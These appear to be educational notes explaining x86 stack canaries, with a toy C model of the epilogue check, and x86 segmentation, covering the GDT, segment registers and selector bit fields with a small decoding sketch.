A stack canary is a tripwire defense against return address overwrites. In particular, it defends against contiguous spatial memory violations in the stack. This defense is inserted by the compiler (e.g. GCC's -fstack-protector family of options).

The canary is a random 4-byte value (on 32-bit x86) that is placed in the stack frame of the protected function, between the local variables and the saved %ebp and return address. A master copy of the canary is kept outside the stack; on Linux it lives in thread-local storage, reached through a segment register (%gs:0x14 on 32-bit x86). When the function returns, the epilogue checks that the canary in the stack frame matches the master copy and calls __stack_chk_fail if it does not. If the canary matches, we can assume that all values above the canary in the stack frame are intact.

[Figure: Stack canary]

Note that this defense is not effective if there is a memory disclosure vulnerability that allows the attacker to read the canary value.
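A toy model of the epilogue check, using a byte array instead of a real frame so the overflow stays well-defined C. The layout and overflow_detected are hypothetical; real compiler-generated code compares against the master copy and calls __stack_chk_fail on a mismatch.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical toy frame, lowest address first:
 *   [0..15] buf  [16..19] canary  [20..23] saved %ebp  [24..27] return address */
#define FRAME_SIZE 28
#define CANARY_OFF 16

/* Hypothetical helper: copy len attacker bytes into buf without a bounds
 * check (capped at the toy frame), then run the epilogue comparison.
 * Returns 1 if the overflow is detected. */
int overflow_detected(uint32_t master, const uint8_t *input, size_t len)
{
    uint8_t frame[FRAME_SIZE] = {0};
    memcpy(frame + CANARY_OFF, &master, sizeof master);   /* prologue */
    if (len > FRAME_SIZE)
        len = FRAME_SIZE;
    memcpy(frame, input, len);                            /* the bug */
    uint32_t slot;
    memcpy(&slot, frame + CANARY_OFF, sizeof slot);       /* epilogue */
    return slot != master;
}
```

A 28-byte overflow that smashes the return address is caught, but if the attacker first leaks the canary and writes that exact value back into its slot, the check passes. This is why a memory disclosure defeats the defense.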

x86 Segmentation

The memory management unit (MMU) has a segmentation unit and a paging unit. The segmentation unit translates a logical address (segment plus offset) into a linear address, which the paging unit then translates into a physical address; segments divide memory into chunks so processes can run in separate segments. The global descriptor table (GDT) is a data structure in the kernel that contains a segment descriptor for each segment. Each segment descriptor describes the segment's base address and limit.

There are six 16-bit segment registers in x86: %cs, %ds, %es, %fs, %gs, and %ss. Each holds a segment selector, which is used to index the GDT to get a particular segment descriptor. Every address that references the code segment uses the %cs selector. Every address that references the stack segment uses the %ss selector.

Specifically, the 13 most-significant bits of the selector are the index into the GDT that picks a segment descriptor. Bit 2 (the third bit from the right) is the table indicator (TI), which specifies whether to use the GDT (0) or the local descriptor table (LDT) (1). The 2 least-significant bits are the requested privilege level (RPL).

For example, assuming TI is 0, the address below resolves to GDT[%fs >> 3].base + 0x00010203.

mov %fs:0x00010203, %eax
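The selector fields described above, decoded as a sketch. decode_selector and linear_addr are hypothetical helpers; the descriptor's base would come from the GDT in the kernel, so here it is simply a parameter.

```c
#include <stdint.h>

/* Hypothetical struct: fields of a 16-bit x86 segment selector. */
struct selector {
    unsigned index;  /* bits 15..3: descriptor index into the GDT/LDT */
    unsigned ti;     /* bit 2: table indicator, 0 = GDT, 1 = LDT      */
    unsigned rpl;    /* bits 1..0: requested privilege level          */
};

/* Hypothetical helper: split a selector into its three fields. */
struct selector decode_selector(uint16_t sel)
{
    struct selector s = { sel >> 3, (sel >> 2) & 1u, sel & 3u };
    return s;
}

/* Hypothetical helper: linear address of seg:offset, given the base
 * stored in that segment's descriptor. */
uint32_t linear_addr(uint32_t seg_base, uint32_t offset)
{
    return seg_base + offset;
}
```

For example, selector 0x7b decodes to GDT index 15, TI 0, and RPL 3 (user privilege).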

The nice thing about segmentation is that it is not possible to find the address of the segment base through memory disclosure vulnerabilities. This is because the segment base is stored in the GDT, which lives in kernel space and is only accessible through segment selectors.
